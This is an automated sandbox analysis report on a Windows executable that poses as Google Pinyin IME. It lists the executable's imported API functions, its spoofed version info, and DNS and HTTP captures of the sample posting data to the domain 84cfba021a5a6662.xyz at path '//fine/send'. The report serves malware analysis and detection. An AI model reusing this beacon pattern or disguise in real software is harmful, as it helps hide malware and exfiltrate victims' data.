ADVAPI32.dll	RegCreateKeyExW, RegQueryValueExW, RegQueryInfoKeyW, RegDeleteKeyW, RegDeleteValueW, RegOpenKeyExW, RegEnumKeyExW, RegCloseKey, RegSetValueExW, GetSidSubAuthority, GetSidSubAuthorityCount, CryptGetHashParam, RegEnumValueW, LookupAccountNameW, CryptHashData, CryptDestroyHash, CryptDestroyKey, CryptCreateHash, CryptImportKey, CryptReleaseContext, CryptVerifySignatureW, CryptAcquireContextW, SetSecurityDescriptorDacl, SetEntriesInAclW, InitializeSecurityDescriptor, CreateWellKnownSid, CopySid, GetLengthSid, ConvertSidToStringSidW, GetSecurityInfo, DuplicateTokenEx, DuplicateToken, CreateRestrictedToken, ConvertStringSidToSidW, SetTokenInformation, CreateProcessAsUserW, SetThreadToken, LookupPrivilegeValueW, RegFlushKey, EqualSid, GetTokenInformation, OpenProcessToken, FreeSid, CheckTokenMembership, AllocateAndInitializeSid, SetSecurityInfo, GetSecurityDescriptorSacl, ConvertStringSecurityDescriptorToSecurityDescriptorW, RegOpenCurrentUser, GetUserNameW
KERNEL32.dll	Process32FirstW, AssignProcessToJobObject, GetThreadContext, CreateToolhelp32Snapshot, DuplicateHandle, WriteProcessMemory, ResumeThread, SetInformationJobObject, CreateJobObjectW, GetFileSizeEx, FileTimeToLocalFileTime, GetDriveTypeW, FindFirstFileExW, GetFileInformationByHandle, PeekNamedPipe, FreeResource, VerSetConditionMask, VerifyVersionInfoW, GetVolumeInformationW, GetComputerNameW, Process32NextW, OpenMutexW, CreateProcessW, WaitForSingleObject, GetTickCount, InitializeCriticalSection, WideCharToMultiByte, TerminateProcess, GetModuleFileNameA, IsDebuggerPresent, OutputDebugStringA, ReleaseMutex, GetCurrentProcessId, DebugBreak, GetTempPathA, LocalFree, VirtualQuery, GetCurrentThread, GetSystemTime, CreateSemaphoreW, LoadLibraryW, TerminateThread, ReleaseSemaphore, CreateFileW, WriteFile, ResetEvent, SetEvent, WaitForMultipleObjects, GetSystemDirectoryW, FindFirstFileW, FindNextFileW, GetFullPathNameW, GetShortPathNameW, DeleteFileW, RemoveDirectoryW, LockResource, FindResourceExW, FindClose, GetVersionExW, GetNativeSystemInfo, OpenFileMappingW, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, OpenEventW, HeapFree, GetProcessHeap, HeapAlloc, MoveFileExW, GetSystemWow64DirectoryW, OpenProcess, CopyFileW, SetFileAttributesW, FlushViewOfFile, CreateDirectoryW, GetFileSize, MulDiv, CreateTimerQueueTimer, DeleteTimerQueueTimer, GetTempFileNameW, GetTempPathW, ConnectNamedPipe, CreateNamedPipeW, ReadFile, CreateEventW, Sleep, GetSystemDefaultLangID, GetLocaleInfoW, CompareStringW, FlushInstructionCache, SetLastError, lstrcpyW, SetFilePointer, SetEndOfFile, GetStartupInfoW, GetCurrentDirectoryW, MoveFileW, SetCurrentDirectoryW, SystemTimeToFileTime, FileTimeToSystemTime, GetFileAttributesW, LocalFileTimeToFileTime, SetFileTime, HeapDestroy, HeapReAlloc, HeapSize, InterlockedCompareExchange, InterlockedPushEntrySList, IsProcessorFeaturePresent, VirtualFree, VirtualAlloc, InterlockedPopEntrySList, InterlockedExchange, EncodePointer, DecodePointer, UnhandledExceptionFilter, GetCommandLineW, HeapSetInformation, GetSystemTimeAsFileTime, ExitProcess, RtlUnwind, GetCPInfo, LCMapStringW, HeapCreate, GetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, QueryPerformanceCounter, GetACP, GetOEMCP, IsValidCodePage, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetTimeZoneInformation, GetStringTypeW, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, WriteConsoleW, SetStdHandle, CreateFileA, SetEnvironmentVariableA, VirtualUnlock, VirtualLock, GetProcessWorkingSetSize, CreateThread, CloseHandle, GetCurrentThreadId, DeleteCriticalSection, lstrcmpiW, SetProcessWorkingSetSize, EnterCriticalSection, GetProcAddress, GetLastError, RaiseException, lstrlenW, MultiByteToWideChar, GetModuleFileNameW, LeaveCriticalSection, SizeofResource, InitializeCriticalSectionAndSpinCount, GetModuleHandleW, GetCurrentProcess, InterlockedDecrement, InterlockedIncrement, LoadLibraryExW, LoadResource, FreeLibrary, FindResourceW, SetPriorityClass, CreateMutexW, SetUnhandledExceptionFilter
USER32.dll	FillRect, GetWindowRect, ScreenToClient, SetCursor, EndPaint, UnregisterClassA, DispatchMessageW, DefWindowProcW, MessageBoxW, LoadStringW, PeekMessageW, TranslateMessage, CharNextW, GetMessageW, DestroyWindow, SetCapture, DrawTextW, GetFocus, DialogBoxParamW, TrackMouseEvent, LoadCursorW, MessageBeep, IsWindowEnabled, GetClientRect, SetFocus, SetRectEmpty, BeginPaint, PtInRect, GetDC, IsWindow, GetCapture, DrawFocusRect, OffsetRect, InvalidateRect, GetClassNameW, ReleaseDC, MonitorFromWindow, GetDlgItem, EndDialog, GetSysColor, SetWindowPos, GetCursorPos, CheckDlgButton, ShowWindow, IsDlgButtonChecked, GetActiveWindow, ReleaseCapture, SetDlgItemTextW, SendMessageW, MapWindowPoints, UpdateWindow, EnableWindow, GetDlgCtrlID, SetWindowTextW, GetMonitorInfoW, CallWindowProcW, GetWindow, LoadIconW, GetWindowLongW, SetWindowLongW, GetWindowTextW, GetWindowTextLengthW, CreateWindowExW, RegisterClassW, GetParent, wvsprintfW
VERSION.dll	VerQueryValueW
ole32.dll	CoCreateInstance, CoUninitialize, CoTaskMemRealloc, CoInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromGUID2, CoCreateGuid
OLEAUT32.dll	SafeArrayUnlock, VariantInit, VarUI4FromStr, SysFreeString, SysAllocString, VariantClear, SafeArrayGetLBound, SafeArrayDestroy, SafeArrayCreate, SafeArrayRedim, SafeArrayLock, SafeArrayGetVartype, SafeArrayGetUBound, SafeArrayCopy
COMCTL32.dll	InitCommonControlsEx
GDI32.dll	SetTextColor, CreateFontIndirectW, SetBkMode, DeleteObject, SelectObject, GetObjectW, GetStockObject
dbghelp.dll	SymFunctionTableAccess64, SymGetModuleBase64, StackWalk64
SETUPAPI.dll	SetupInitDefaultQueueCallback, SetupIterateCabinetW, SetupDefaultQueueCallbackW, SetupTermDefaultQueueCallback
WINTRUST.dll	WinVerifyTrust
CRYPT32.dll	CertCloseStore, CertFreeCertificateContext, CryptQueryObject, CertEnumCertificatesInStore, CryptDecodeObject, CryptProtectData, CryptUnprotectData, CertDuplicateCertificateContext, CertNameToStrW
PSAPI.DLL	GetModuleFileNameExW
SHELL32.dll	CommandLineToArgvW, Shell_NotifyIconW, SHGetSpecialFolderPathW, SHCreateDirectoryExW, SHGetFolderPathW, ShellExecuteExW, SHFileOperationW, ShellExecuteW
SHLWAPI.dll	PathRemoveFileSpecW, PathFindExtensionW, PathAddExtensionW, UrlEscapeW, PathFindFileNameW, PathRemoveExtensionW, PathFileExistsW, PathCommonPrefixW, PathRemoveBackslashW, PathCombineW, PathAppendW, PathStripPathW, PathIsDirectoryW, PathIsRelativeW, PathCanonicalizeW
urlmon.dll	URLDownloadToFileW
WININET.dll	HttpOpenRequestW, InternetCloseHandle, DeleteUrlCacheEntryW, InternetCrackUrlW, InternetOpenW, InternetReadFile, InternetConnectW, HttpSendRequestW, HttpQueryInfoW, InternetQueryDataAvailable
IPHLPAPI.DLL	GetAdaptersInfo

Version Infos

Description	Data
LegalCopyright	Copyright (C) 2008
InternalName	Google Pinyin
FileVersion	2.7.25.128
CompanyName	Google Inc.
ProductName	Google Pinyin IME
ProductVersion	2.7.25.128
FileDescription	Google Pinyin IME
Translation	0x0804 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 29, 2021 17:38:38.629965067 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.678442955 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.678564072 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.678960085 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.679003000 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.725050926 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.725073099 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.736063004 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.736099958 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.736125946 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.736150026 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.736166000 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.736212015 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.736237049 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.746789932 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.746871948 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.793273926 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.793298960 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.798671007 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.798837900 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.798856020 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.798871040 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.798882008 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.798902988 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.798929930 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.929573059 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.929651022 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.976480961 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.976506948 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.990947008 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.990974903 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.991063118 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.991370916 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.991396904 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:38.991452932 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:38.992382050 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:39.073061943 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:42.105988979 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:42.106060028 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:42.152085066 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:42.157530069 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:42.157551050 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:42.157649040 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:42.157977104 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:42.157994032 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:42.158044100 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:42.158929110 CET	80	49717	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:42.276395082 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:46.534598112 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:46.580199957 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:46.580327034 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:46.580929995 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:46.580970049 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:46.626388073 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:46.626430035 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:46.659503937 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:46.659538031 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:46.659560919 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:46.659573078 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:46.659586906 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:46.659627914 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:46.659672976 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:48.740354061 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:48.786232948 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:48.786313057 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:48.794128895 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:48.794214964 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:48.840146065 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:48.840168953 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:48.865298986 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:48.865328074 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:48.865345955 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:48.865360975 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:48.865372896 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:48.865417004 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:48.865438938 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:50.929253101 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:50.929301977 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:50.975228071 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:50.975272894 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:50.982594967 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:50.982636929 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:50.982666969 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:50.982681036 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:50.982695103 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:50.982716084 CET	80	49722	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:50.982732058 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:51.037255049 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:51.175381899 CET	49717	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:56.520461082 CET	49722	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:57.523209095 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:57.523325920 CET	49720	80	192.168.2.5	104.21.23.16
Jan 29, 2021 17:38:57.568842888 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.568869114 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.578520060 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.578546047 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.578562975 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.578577995 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.578589916 CET	80	49720	104.21.23.16	192.168.2.5
Jan 29, 2021 17:38:57.578664064 CET	49720	80	192.168.2.5	104.21.23.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 29, 2021 17:38:27.302711964 CET	54795	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:27.352559090 CET	53	54795	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:28.275805950 CET	49557	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:28.326750994 CET	53	49557	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:29.316663980 CET	61733	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:29.364526987 CET	53	61733	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:30.362878084 CET	65447	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:30.413861036 CET	53	65447	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:31.698425055 CET	52441	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:31.756263018 CET	53	52441	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:31.938312054 CET	62176	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:31.995935917 CET	53	62176	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:33.800276041 CET	59596	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:33.848179102 CET	53	59596	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:35.741360903 CET	65296	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:35.792155027 CET	53	65296	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:37.242661953 CET	63183	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:37.290729046 CET	53	63183	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:38.545653105 CET	60151	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:38.608894110 CET	53	60151	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:39.016016006 CET	56969	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:39.066718102 CET	53	56969	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:46.470663071 CET	55161	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:46.521174908 CET	53	55161	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:48.390662909 CET	54757	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:48.447154045 CET	53	54757	8.8.8.8	192.168.2.5
Jan 29, 2021 17:38:48.941138983 CET	49992	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:38:49.004883051 CET	53	49992	8.8.8.8	192.168.2.5
Jan 29, 2021 17:39:07.998764992 CET	60075	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:39:08.047472000 CET	53	60075	8.8.8.8	192.168.2.5
Jan 29, 2021 17:39:17.272034883 CET	55016	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:39:17.330410004 CET	53	55016	8.8.8.8	192.168.2.5
Jan 29, 2021 17:39:17.341788054 CET	64345	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:39:17.389991999 CET	53	64345	8.8.8.8	192.168.2.5
Jan 29, 2021 17:39:19.839441061 CET	57128	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:39:19.890294075 CET	53	57128	8.8.8.8	192.168.2.5
Jan 29, 2021 17:39:23.981044054 CET	54791	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:39:24.040030956 CET	53	54791	8.8.8.8	192.168.2.5
Jan 29, 2021 17:39:31.853482008 CET	50463	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:39:31.916234970 CET	53	50463	8.8.8.8	192.168.2.5
Jan 29, 2021 17:39:48.442440033 CET	50394	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:39:48.516184092 CET	53	50394	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:06.826400042 CET	58530	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:06.885725021 CET	53	58530	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:07.455677032 CET	53813	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:07.506537914 CET	53	53813	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:08.294910908 CET	63732	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:08.351274967 CET	53	63732	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:08.736057043 CET	57344	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:08.794970036 CET	53	57344	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:09.225752115 CET	54450	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:09.287789106 CET	53	54450	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:09.808257103 CET	59261	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:09.868410110 CET	53	59261	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:10.324461937 CET	57151	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:10.380609035 CET	53	57151	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:11.045612097 CET	59413	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:11.104239941 CET	53	59413	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:11.746665001 CET	60516	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:11.810204029 CET	53	60516	8.8.8.8	192.168.2.5
Jan 29, 2021 17:41:12.223228931 CET	51649	53	192.168.2.5	8.8.8.8
Jan 29, 2021 17:41:12.279397964 CET	53	51649	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 29, 2021 17:38:38.545653105 CET	192.168.2.5	8.8.8.8	0x3eda	Standard query (0)	84cfba021a5a6662.xyz	A (IP address)	IN (0x0001)
Jan 29, 2021 17:38:46.470663071 CET	192.168.2.5	8.8.8.8	0x8685	Standard query (0)	84cfba021a5a6662.xyz	A (IP address)	IN (0x0001)
Jan 29, 2021 17:38:48.390662909 CET	192.168.2.5	8.8.8.8	0x9341	Standard query (0)	84cfba021a5a6662.xyz	A (IP address)	IN (0x0001)
Jan 29, 2021 17:39:23.981044054 CET	192.168.2.5	8.8.8.8	0x34f7	Standard query (0)	84CFBA021A5A6662.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 29, 2021 17:38:38.608894110 CET	8.8.8.8	192.168.2.5	0x3eda	No error (0)	84cfba021a5a6662.xyz	104.21.23.16	A (IP address)	IN (0x0001)
Jan 29, 2021 17:38:38.608894110 CET	8.8.8.8	192.168.2.5	0x3eda	No error (0)	84cfba021a5a6662.xyz	172.67.208.74	A (IP address)	IN (0x0001)
Jan 29, 2021 17:38:46.521174908 CET	8.8.8.8	192.168.2.5	0x8685	No error (0)	84cfba021a5a6662.xyz	104.21.23.16	A (IP address)	IN (0x0001)
Jan 29, 2021 17:38:46.521174908 CET	8.8.8.8	192.168.2.5	0x8685	No error (0)	84cfba021a5a6662.xyz	172.67.208.74	A (IP address)	IN (0x0001)
Jan 29, 2021 17:38:48.447154045 CET	8.8.8.8	192.168.2.5	0x9341	No error (0)	84cfba021a5a6662.xyz	104.21.23.16	A (IP address)	IN (0x0001)
Jan 29, 2021 17:38:48.447154045 CET	8.8.8.8	192.168.2.5	0x9341	No error (0)	84cfba021a5a6662.xyz	172.67.208.74	A (IP address)	IN (0x0001)
Jan 29, 2021 17:39:24.040030956 CET	8.8.8.8	192.168.2.5	0x34f7	No error (0)	84CFBA021A5A6662.xyz	104.21.23.16	A (IP address)	IN (0x0001)
Jan 29, 2021 17:39:24.040030956 CET	8.8.8.8	192.168.2.5	0x34f7	No error (0)	84CFBA021A5A6662.xyz	172.67.208.74	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

84cfba021a5a6662.xyz

84cfba021a5a6662.xy

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49717	104.21.23.16	80	C:\Users\user\Desktop\N1yprTBBXs.exe

Timestamp	kBytes transferred	Direction	Data
Jan 29, 2021 17:38:38.678960085 CET	201	OUT	POST //fine/send HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 82 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:38.736063004 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d7bca264b855809d8d4b05eb87c1fc9ff1611938318; expires=Sun, 28-Feb-21 16:38:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09be17b000020742ba61000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=a3UCUvsAer7TzlHI7RqZ210zp4MXD4TkVbciut%2BqSqgM88D7lkh5NCuuNNnGNouxY9fCPsAPQ84cnzGgw14sT6V%2FvdKx4QyHNVgG35%2F90O5FN99pkg%3D%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6194627bfdd62074-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta 